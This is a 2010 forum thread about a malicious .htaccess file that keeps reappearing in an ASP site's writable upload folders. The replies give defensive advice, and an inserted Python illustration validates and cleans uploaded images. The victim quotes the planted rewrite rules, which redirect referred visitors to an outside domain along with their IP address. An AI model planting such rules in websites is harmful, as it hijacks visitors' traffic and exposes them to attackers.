Write access on upload folder creates security vulnerability - how do I fix this?


stevio
12-27-2010, 06:20 PM
I have an ASP web site, on a Windows server, that allows users to upload image files after logging into a control panel.

To do this, write access is enabled on the folder that the images are uploaded to. This has worked fine for a long time.

However I recently discovered that a malicious .htaccess file had been uploaded to this folder. The file was not uploaded using my form for uploading images.

This .htaccess was preventing the uploaded images from being viewed on the web site with the following code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

If I deleted the file, it would soon reappear.

How can I fix this problem, so that users can continue to upload images after logging into my control panel, but malicious files like this cannot be uploaded?

I understand that allowing write access on a folder means that this is a potential issue, but how do they actually upload the file? What type of program are they using? How do you do an HTTP upload without using a file on the server? To upload images normally, users have to use the ASP code I wrote which sits on the server.

Old Pedant
12-27-2010, 07:32 PM
Two suggestions:

(1) Check the file name and file type!! If that file had been named even ".htaccess.jpg" it wouldn't have done anything. So as part of your upload process, *ONLY* allow files with known image extensions (e.g., ".jpg", ".jpeg", ".gif", ".png").

(2) Validate that the file uploaded *IS* an image. You can do this if you have a component such as AspJpeg available to you. This is what I do:
-- For all upload image files, I do *not* save them directly to disk.
-- Instead, I first get them into the upload component's memory buffer and then I load them into AspJpeg.
-- If AspJpeg chokes on the file, I know it's not an image, and so I reject it.
-- It's possible to hide bogus info in an image file, so I then RESIZE the image, using AspJpeg. Besides, this is a good thing to do, to make sure that the uploaded images aren't too large.
-- I then store the images to disk, finally, after being resized, and I always store them as JPEG images (could instead always store as PNG).

So far, this has worked. Those few malicious uploads that I've gotten have been stopped completely. In the process of resizing the image, even those images with embedded viruses get their viruses stripped off, because AspJpeg simply saves *ONLY* the actual image bits, after the resize, *AND* completely re-does the JPEG (or PNG) compression, discarding the original compression information.
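The gate described in this answer (extension whitelist, then prove the bytes are an image, then re-save only the picture data) as an added illustration in Python. It is not Old Pedant's ASP/AspJpeg code: function names such as validate_upload and rewrite_png are my own, the sample PNG is constructed inline, and the PNG chunk rewrite stands in for the AspJpeg resize-and-resave step by keeping only the chunks that carry pixel data and dropping ancillary chunks and anything after IEND. JPEG and GIF get a signature check only here; a real deployment decodes and re-encodes them with an image library, as the post does.

```python
import os
import struct
import zlib

# Point (1) of the post: a whitelist of image extensions. os.path.splitext treats a
# leading-dot name such as ".htaccess" as having no extension, so it is rejected.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".gif", ".png"}

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types that carry picture data. Everything else (tEXt, zTXt, iTXt, eXIf, ...)
# is ancillary and is where foreign content is usually stashed inside a "valid" image.
PNG_KEEP = {b"IHDR", b"PLTE", b"tRNS", b"IDAT", b"IEND"}


def extension_ok(filename):
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return ext in ALLOWED_EXTENSIONS


def sniff_format(data):
    """Return 'png', 'jpeg' or 'gif' from the leading bytes, or None."""
    if data.startswith(PNG_SIGNATURE):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    return None


def _png_chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def rewrite_png(data):
    """Walk the PNG chunk by chunk, verify every length and CRC, and re-emit only
    the chunks in PNG_KEEP. Returns (clean_bytes, dropped), where dropped lists the
    chunk types (or 'trailing-data') that were discarded. Raises ValueError on any
    structural fault, which the caller treats as 'not an image'."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIGNATURE)
    out = [PNG_SIGNATURE]
    dropped = []
    seen_ihdr = False
    while True:
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc_bytes) != 4:
            raise ValueError("truncated chunk %r" % ctype)
        if struct.unpack(">I", crc_bytes)[0] != zlib.crc32(ctype + payload) & 0xFFFFFFFF:
            raise ValueError("bad CRC on chunk %r" % ctype)
        if not seen_ihdr and ctype != b"IHDR":
            raise ValueError("first chunk is not IHDR")
        seen_ihdr = True
        pos += 12 + length
        if ctype in PNG_KEEP:
            out.append(_png_chunk(ctype, payload))
        else:
            dropped.append(ctype.decode("latin-1"))
        if ctype == b"IEND":
            break
    if pos != len(data):          # bytes glued on after IEND are not part of the image
        dropped.append("trailing-data")
    return b"".join(out), dropped


def validate_upload(filename, data):
    """The whole gate: extension whitelist, content sniff, then (for PNG) the
    structural rewrite. Returns (accepted, reason, clean_data)."""
    if not extension_ok(filename):
        return False, "extension not allowed", None
    fmt = sniff_format(data)
    if fmt is None:
        return False, "content is not a recognised image", None
    if fmt == "png":
        try:
            clean, dropped = rewrite_png(data)
        except ValueError as exc:
            return False, "malformed PNG: %s" % exc, None
        return True, "png rewritten, dropped: %s" % (dropped or "nothing"), clean
    # JPEG/GIF: signature only in this example; decode and re-encode with an image
    # library in production, which is what the AspJpeg resize step achieves.
    return True, fmt + " signature ok (re-encode with an image library)", data


def make_sample_png():
    """Constructed 1x1 red PNG carrying a tEXt chunk and extra bytes after IEND:
    a file that passes a naive 'is it a PNG?' check but is not only an image."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")               # filter byte + one pixel
    text = b"Comment\x00text that is not picture data"
    return (PNG_SIGNATURE + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"tEXt", text)
            + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"")
            + b"RewriteEngine On\n")


if __name__ == "__main__":
    for name, blob in [(".htaccess", b"RewriteEngine On\n"),
                       (".htaccess.jpg", b"RewriteEngine On\n"),
                       ("photo.png", make_sample_png())]:
        ok, why, _ = validate_upload(name, blob)
        print("%-15s %-7s %s" % (name, "ACCEPT" if ok else "REJECT", why))
```

Running it shows the three outcomes the post describes: ".htaccess" fails the extension check, ".htaccess.jpg" passes the name check but is rejected because its bytes are not an image, and the constructed PNG is accepted only after its tEXt chunk and the bytes after IEND have been thrown away. Because the output is rebuilt from the parsed chunks, the file written to disk contains nothing the parser did not understand, which is the same property the re-compression in AspJpeg gives.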

Old Pedant
12-27-2010, 07:35 PM
If you mean that the hackers are doing this WITHOUT using your upload control, then probably they are using HTTP PUT. Yes, there really is a little-known command in the HTTP protocol that simply does a PUT directly to the server. (This is in addition to GET and POST and HEAD). Look here:
http://msdn.microsoft.com/en-us/library/aa227461%28v=vs.60%29.aspx

You *should* be able to configure IIS to not allow PUT commands.

stevio
12-28-2010, 01:00 AM
Thanks for the replies. Yes, the files are being uploaded without the use of my upload form (my upload form is only accessible within a password protected control panel).

I even checked the log files one of the times the files appeared and there was no record of these files being uploaded at the time they were uploaded.

The other night (the early hours of Christmas morning in fact), I was deleting the files and within 15 mins, perhaps less, they had reappeared! It is obviously an automated hacking spamming system that was doing it.

Also, the malicious .htaccess file appeared in 8 different folders that had write access enabled, one of which was a database folder above the wwwroot folder (can you do that with http put?). 4 of the folders were folders within a folder for a phpbb forum (cache, avatars upload folder, etc). 2 were pictures folders, 1 was the database folder and 1 was a folder that shouldn't have had write access enabled so I disabled it.

stevio
12-28-2010, 01:50 AM
You *should* be able to configure IIS to not allow PUT commands.
If this is the case, will I still be able to upload images from my upload form (using ASPUpload) if HTTP PUT is disabled?
Thanks.

Old Pedant
12-28-2010, 01:54 AM
Ugh. You've picked up a virus somewhere, I would guess. No, HTTP PUT can't "put" anything into any non-web-accessible folder. That has to be happening thanks to some malicious code running on your server.